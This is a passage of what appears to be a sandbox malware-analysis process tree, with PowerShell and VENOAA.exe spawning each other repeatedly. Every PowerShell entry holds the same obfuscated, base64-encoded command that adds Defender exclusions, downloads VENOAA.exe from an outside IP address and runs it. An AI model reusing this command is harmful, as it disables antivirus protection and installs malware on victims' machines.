        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGYAZABtACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAYQBkAGoAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAeQB6AHMAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAcgBlAGgAIwA+ADsAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcAA6AC8ALwA5ADMALgAxADIAMwAuADgANQAuADEAMAA4AC8AVgBFAE4ATwBBAEEALgBlAHgAZQAnACwAIAA8ACMAYgBlAHIAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgADwAIwBwAGMAdwAjAD4AIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAVABlAG0AcAAgADwAIwBwAGQAcQAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwBWAEUATgBPAEEAQQAuAGUAeABlACcAKQApADwAIwB2AGEAcQAjAD4AOwAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgADwAIwBoAG4AZAAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAALQBQAGEAdABoACAAJABlAG4AdgA6AFQAZQBtAHAAIAA8ACMAaABwAGUAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAVgBFAE4ATwBBAEEALgBlAHgAZQAnACkAPAAjAG4AaQBiACMAPgA="
        238⤵
        
        PID:4720
        
        C:\Users\Admin\AppData\Local\Temp\VENOAA.exe
        
        "C:\Users\Admin\AppData\Local\Temp\VENOAA.exe"
        239⤵
        Checks computer location settings
        
        PID:3608
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGYAZABtACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAYQBkAGoAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAeQB6AHMAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAcgBlAGgAIwA+ADsAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcAA6AC8ALwA5ADMALgAxADIAMwAuADgANQAuADEAMAA4AC8AVgBFAE4ATwBBAEEALgBlAHgAZQAnACwAIAA8ACMAYgBlAHIAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgADwAIwBwAGMAdwAjAD4AIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAVABlAG0AcAAgADwAIwBwAGQAcQAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwBWAEUATgBPAEEAQQAuAGUAeABlACcAKQApADwAIwB2AGEAcQAjAD4AOwAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgADwAIwBoAG4AZAAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAALQBQAGEAdABoACAAJABlAG4AdgA6AFQAZQBtAHAAIAA8ACMAaABwAGUAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAVgBFAE4ATwBBAEEALgBlAHgAZQAnACkAPAAjAG4AaQBiACMAPgA="
        240⤵
        
        PID:424
        
        C:\Users\Admin\AppData\Local\Temp\VENOAA.exe
        
        "C:\Users\Admin\AppData\Local\Temp\VENOAA.exe"
        241⤵
        
        PID:3316
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGYAZABtACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAYQBkAGoAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAeQB6AHMAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAcgBlAGgAIwA+ADsAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcAA6AC8ALwA5ADMALgAxADIAMwAuADgANQAuADEAMAA4AC8AVgBFAE4ATwBBAEEALgBlAHgAZQAnACwAIAA8ACMAYgBlAHIAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgADwAIwBwAGMAdwAjAD4AIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAVABlAG0AcAAgADwAIwBwAGQAcQAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwBWAEUATgBPAEEAQQAuAGUAeABlACcAKQApADwAIwB2AGEAcQAjAD4AOwAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgADwAIwBoAG4AZAAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAALQBQAGEAdABoACAAJABlAG4AdgA6AFQAZQBtAHAAIAA8ACMAaABwAGUAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAVgBFAE4ATwBBAEEALgBlAHgAZQAnACkAPAAjAG4AaQBiACMAPgA="
        242⤵
        
        PID:3228
        
        C:\Users\Admin\AppData\Local\Temp\VENOAA.exe
        
        "C:\Users\Admin\AppData\Local\Temp\VENOAA.exe"
        243⤵
        
        PID:4332
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGYAZABtACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAYQBkAGoAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAeQB6AHMAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAcgBlAGgAIwA+ADsAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcAA6AC8ALwA5ADMALgAxADIAMwAuADgANQAuADEAMAA4AC8AVgBFAE4ATwBBAEEALgBlAHgAZQAnACwAIAA8ACMAYgBlAHIAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgADwAIwBwAGMAdwAjAD4AIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAVABlAG0AcAAgADwAIwBwAGQAcQAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwBWAEUATgBPAEEAQQAuAGUAeABlACcAKQApADwAIwB2AGEAcQAjAD4AOwAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgADwAIwBoAG4AZAAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAALQBQAGEAdABoACAAJABlAG4AdgA6AFQAZQBtAHAAIAA8ACMAaABwAGUAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAVgBFAE4ATwBBAEEALgBlAHgAZQAnACkAPAAjAG4AaQBiACMAPgA="
        244⤵
        
        PID:1424
        
        C:\Users\Admin\AppData\Local\Temp\VENOAA.exe
        
        "C:\Users\Admin\AppData\Local\Temp\VENOAA.exe"
        245⤵
        Checks computer location settings
        
        PID:4548
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGYAZABtACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAYQBkAGoAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAeQB6AHMAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAcgBlAGgAIwA+ADsAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcAA6AC8ALwA5ADMALgAxADIAMwAuADgANQAuADEAMAA4AC8AVgBFAE4ATwBBAEEALgBlAHgAZQAnACwAIAA8ACMAYgBlAHIAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgADwAIwBwAGMAdwAjAD4AIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAVABlAG0AcAAgADwAIwBwAGQAcQAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwBWAEUATgBPAEEAQQAuAGUAeABlACcAKQApADwAIwB2AGEAcQAjAD4AOwAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgADwAIwBoAG4AZAAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAALQBQAGEAdABoACAAJABlAG4AdgA6AFQAZQBtAHAAIAA8ACMAaABwAGUAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAVgBFAE4ATwBBAEEALgBlAHgAZQAnACkAPAAjAG4AaQBiACMAPgA="
        246⤵
        
        PID:3892
        
        C:\Users\Admin\AppData\Local\Temp\VENOAA.exe
        
        "C:\Users\Admin\AppData\Local\Temp\VENOAA.exe"
        247⤵
        Checks computer location settings
        
        PID:5096
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGYAZABtACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAYQBkAGoAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAeQB6AHMAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAcgBlAGgAIwA+ADsAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcAA6AC8ALwA5ADMALgAxADIAMwAuADgANQAuADEAMAA4AC8AVgBFAE4ATwBBAEEALgBlAHgAZQAnACwAIAA8ACMAYgBlAHIAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgADwAIwBwAGMAdwAjAD4AIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAVABlAG0AcAAgADwAIwBwAGQAcQAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwBWAEUATgBPAEEAQQAuAGUAeABlACcAKQApADwAIwB2AGEAcQAjAD4AOwAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgADwAIwBoAG4AZAAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAALQBQAGEAdABoACAAJABlAG4AdgA6AFQAZQBtAHAAIAA8ACMAaABwAGUAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAVgBFAE4ATwBBAEEALgBlAHgAZQAnACkAPAAjAG4AaQBiACMAPgA="
        248⤵
        
        PID:4784
        
        C:\Users\Admin\AppData\Local\Temp\VENOAA.exe
        
        "C:\Users\Admin\AppData\Local\Temp\VENOAA.exe"
        249⤵
        Checks computer location settings
        
        PID:5040
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGYAZABtACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAYQBkAGoAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAeQB6AHMAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAcgBlAGgAIwA+ADsAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcAA6AC8ALwA5ADMALgAxADIAMwAuADgANQAuADEAMAA4AC8AVgBFAE4ATwBBAEEALgBlAHgAZQAnACwAIAA8ACMAYgBlAHIAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgADwAIwBwAGMAdwAjAD4AIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAVABlAG0AcAAgADwAIwBwAGQAcQAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwBWAEUATgBPAEEAQQAuAGUAeABlACcAKQApADwAIwB2AGEAcQAjAD4AOwAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgADwAIwBoAG4AZAAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAALQBQAGEAdABoACAAJABlAG4AdgA6AFQAZQBtAHAAIAA8ACMAaABwAGUAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAVgBFAE4ATwBBAEEALgBlAHgAZQAnACkAPAAjAG4AaQBiACMAPgA="
        250⤵
        
        PID:2344
        
        C:\Users\Admin\AppData\Local\Temp\VENOAA.exe
        
        "C:\Users\Admin\AppData\Local\Temp\VENOAA.exe"
        251⤵
        Checks computer location settings
        
        PID:1148
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGYAZABtACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAYQBkAGoAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAeQB6AHMAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAcgBlAGgAIwA+ADsAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcAA6AC8ALwA5ADMALgAxADIAMwAuADgANQAuADEAMAA4AC8AVgBFAE4ATwBBAEEALgBlAHgAZQAnACwAIAA8ACMAYgBlAHIAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgADwAIwBwAGMAdwAjAD4AIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAVABlAG0AcAAgADwAIwBwAGQAcQAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwBWAEUATgBPAEEAQQAuAGUAeABlACcAKQApADwAIwB2AGEAcQAjAD4AOwAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgADwAIwBoAG4AZAAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAALQBQAGEAdABoACAAJABlAG4AdgA6AFQAZQBtAHAAIAA8ACMAaABwAGUAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAVgBFAE4ATwBBAEEALgBlAHgAZQAnACkAPAAjAG4AaQBiACMAPgA="
        252⤵
        
        PID:4280
        
        C:\Users\Admin\AppData\Local\Temp\VENOAA.exe
        
        "C:\Users\Admin\AppData\Local\Temp\VENOAA.exe"
        253⤵
        
        PID:424
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGYAZABtACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAYQBkAGoAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAeQB6AHMAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAcgBlAGgAIwA+ADsAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcAA6AC8ALwA5ADMALgAxADIAMwAuADgANQAuADEAMAA4AC8AVgBFAE4ATwBBAEEALgBlAHgAZQAnACwAIAA8ACMAYgBlAHIAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgADwAIwBwAGMAdwAjAD4AIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAVABlAG0AcAAgADwAIwBwAGQAcQAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwBWAEUATgBPAEEAQQAuAGUAeABlACcAKQApADwAIwB2AGEAcQAjAD4AOwAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgADwAIwBoAG4AZAAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAALQBQAGEAdABoACAAJABlAG4AdgA6AFQAZQBtAHAAIAA8ACMAaABwAGUAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAVgBFAE4ATwBBAEEALgBlAHgAZQAnACkAPAAjAG4AaQBiACMAPgA="
        254⤵
        
        PID:3296
        
        C:\Users\Admin\AppData\Local\Temp\VENOAA.exe
        
        "C:\Users\Admin\AppData\Local\Temp\VENOAA.exe"
        255⤵
        
        PID:1348
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGYAZABtACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAYQBkAGoAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAeQB6AHMAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAcgBlAGgAIwA+ADsAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcAA6AC8ALwA5ADMALgAxADIAMwAuADgANQAuADEAMAA4AC8AVgBFAE4ATwBBAEEALgBlAHgAZQAnACwAIAA8ACMAYgBlAHIAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgADwAIwBwAGMAdwAjAD4AIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAVABlAG0AcAAgADwAIwBwAGQAcQAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwBWAEUATgBPAEEAQQAuAGUAeABlACcAKQApADwAIwB2AGEAcQAjAD4AOwAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgADwAIwBoAG4AZAAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAALQBQAGEAdABoACAAJABlAG4AdgA6AFQAZQBtAHAAIAA8ACMAaABwAGUAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAVgBFAE4ATwBBAEEALgBlAHgAZQAnACkAPAAjAG4AaQBiACMAPgA="
        256⤵
        
        PID:1704
        
        C:\Users\Admin\AppData\Local\Temp\VENOAA.exe
        
        "C:\Users\Admin\AppData\Local\Temp\VENOAA.exe"
        257⤵
        
        PID:2832
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGYAZABtACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAYQBkAGoAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAeQB6AHMAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAcgBlAGgAIwA+ADsAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcAA6AC8ALwA5ADMALgAxADIAMwAuADgANQAuADEAMAA4AC8AVgBFAE4ATwBBAEEALgBlAHgAZQAnACwAIAA8ACMAYgBlAHIAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgADwAIwBwAGMAdwAjAD4AIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAVABlAG0AcAAgADwAIwBwAGQAcQAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwBWAEUATgBPAEEAQQAuAGUAeABlACcAKQApADwAIwB2AGEAcQAjAD4AOwAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgADwAIwBoAG4AZAAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAALQBQAGEAdABoACAAJABlAG4AdgA6AFQAZQBtAHAAIAA8ACMAaABwAGUAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAVgBFAE4ATwBBAEEALgBlAHgAZQAnACkAPAAjAG4AaQBiACMAPgA="
        258⤵
        
        PID:3528
        
        C:\Users\Admin\AppData\Local\Temp\VENOAA.exe
        
        "C:\Users\Admin\AppData\Local\Temp\VENOAA.exe"
        259⤵
        
        PID:1580
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGYAZABtACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAYQBkAGoAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAeQB6AHMAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAcgBlAGgAIwA+ADsAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcAA6AC8ALwA5ADMALgAxADIAMwAuADgANQAuADEAMAA4AC8AVgBFAE4ATwBBAEEALgBlAHgAZQAnACwAIAA8ACMAYgBlAHIAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgADwAIwBwAGMAdwAjAD4AIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAVABlAG0AcAAgADwAIwBwAGQAcQAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwBWAEUATgBPAEEAQQAuAGUAeABlACcAKQApADwAIwB2AGEAcQAjAD4AOwAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgADwAIwBoAG4AZAAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAALQBQAGEAdABoACAAJABlAG4AdgA6AFQAZQBtAHAAIAA8ACMAaABwAGUAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAVgBFAE4ATwBBAEEALgBlAHgAZQAnACkAPAAjAG4AaQBiACMAPgA="
        260⤵
        
        PID:2596
        
        C:\Users\Admin\AppData\Local\Temp\VENOAA.exe
        
        "C:\Users\Admin\AppData\Local\Temp\VENOAA.exe"
        261⤵
        
        PID:2192
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGYAZABtACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAYQBkAGoAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAeQB6AHMAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAcgBlAGgAIwA+ADsAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcAA6AC8ALwA5ADMALgAxADIAMwAuADgANQAuADEAMAA4AC8AVgBFAE4ATwBBAEEALgBlAHgAZQAnACwAIAA8ACMAYgBlAHIAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgADwAIwBwAGMAdwAjAD4AIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAVABlAG0AcAAgADwAIwBwAGQAcQAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwBWAEUATgBPAEEAQQAuAGUAeABlACcAKQApADwAIwB2AGEAcQAjAD4AOwAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgADwAIwBoAG4AZAAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAALQBQAGEAdABoACAAJABlAG4AdgA6AFQAZQBtAHAAIAA8ACMAaABwAGUAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAVgBFAE4ATwBBAEEALgBlAHgAZQAnACkAPAAjAG4AaQBiACMAPgA="
        262⤵
        
        PID:1612
        
        C:\Users\Admin\AppData\Local\Temp\VENOAA.exe
        
        "C:\Users\Admin\AppData\Local\Temp\VENOAA.exe"
        263⤵
        
        PID:3456
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
